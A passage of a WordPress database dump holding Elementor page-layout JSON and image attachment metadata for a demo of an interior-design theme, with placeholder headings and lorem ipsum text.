/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3379,4786,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3380,4786,'_elementor_pro_version','3.8.1'),(3381,4786,'_elementor_css','a:6:{s:4:\"time\";i:1685012084;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3383,4787,'_wp_attached_file','2023/05/IMG-1065.jpg'),(3384,4787,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1250;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2023/05/IMG-1065.jpg\";s:8:\"filesize\";i:309979;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG-1065-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17660;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG-1065-1024x819.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:819;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127225;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-1065-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7279;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"IMG-1065-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78476;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-1065-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83468;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-1065-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35568;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"IMG-1065-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50985;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"IMG-1065-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73376;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1607895633\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3385,4788,'_wp_attached_file','2023/05/IMG-2927.jpg'),(3386,4788,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1499;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2023/05/IMG-2927.jpg\";s:8:\"filesize\";i:333385;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG-2927-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13347;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG-2927-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92677;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-2927-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6042;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"IMG-2927-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57717;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-2927-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69985;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-2927-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27861;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"IMG-2927-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44818;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"IMG-2927-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62796;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1662458689\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3389,4790,'_wp_attached_file','2023/05/IMG-9402.jpg'),(3390,4790,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1250;s:6:\"height\";i:1074;s:4:\"file\";s:20:\"2023/05/IMG-9402.jpg\";s:8:\"filesize\";i:244011;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG-9402-300x258.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13588;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG-9402-1024x880.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95175;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-9402-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5476;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"IMG-9402-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59137;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-9402-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59137;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-9402-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27597;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"IMG-9402-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40417;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"IMG-9402-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56158;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1625939885\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3391,4791,'_wp_attached_file','2023/05/IMG-2927c-scaled.jpg'),(3392,4791,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1693;s:6:\"height\";i:2560;s:4:\"file\";s:28:\"2023/05/IMG-2927c-scaled.jpg\";s:8:\"filesize\";i:483539;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"IMG-2927c-198x300.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12734;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"IMG-2927c-677x1024.jpg\";s:5:\"width\";i:677;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98537;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"IMG-2927c-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5793;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"IMG-2927c-768x1161.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1161;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121150;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"IMG-2927c-1016x1536.jpg\";s:5:\"width\";i:1016;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:195733;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:23:\"IMG-2927c-1354x2048.jpg\";s:5:\"width\";i:1354;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324562;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:21:\"IMG-2927c-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72860;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:21:\"IMG-2927c-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32964;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:21:\"IMG-2927c-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48911;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:21:\"IMG-2927c-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65559;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:13:\"IMG-2927c.jpg\";}'),(3393,4792,'_wp_page_template','elementor_header_footer'),(3394,4792,'_elementor_edit_mode','builder'),(3395,4792,'_elementor_template_type','wp-page'),(3396,4792,'_elementor_version','3.8.1'),(3397,4792,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes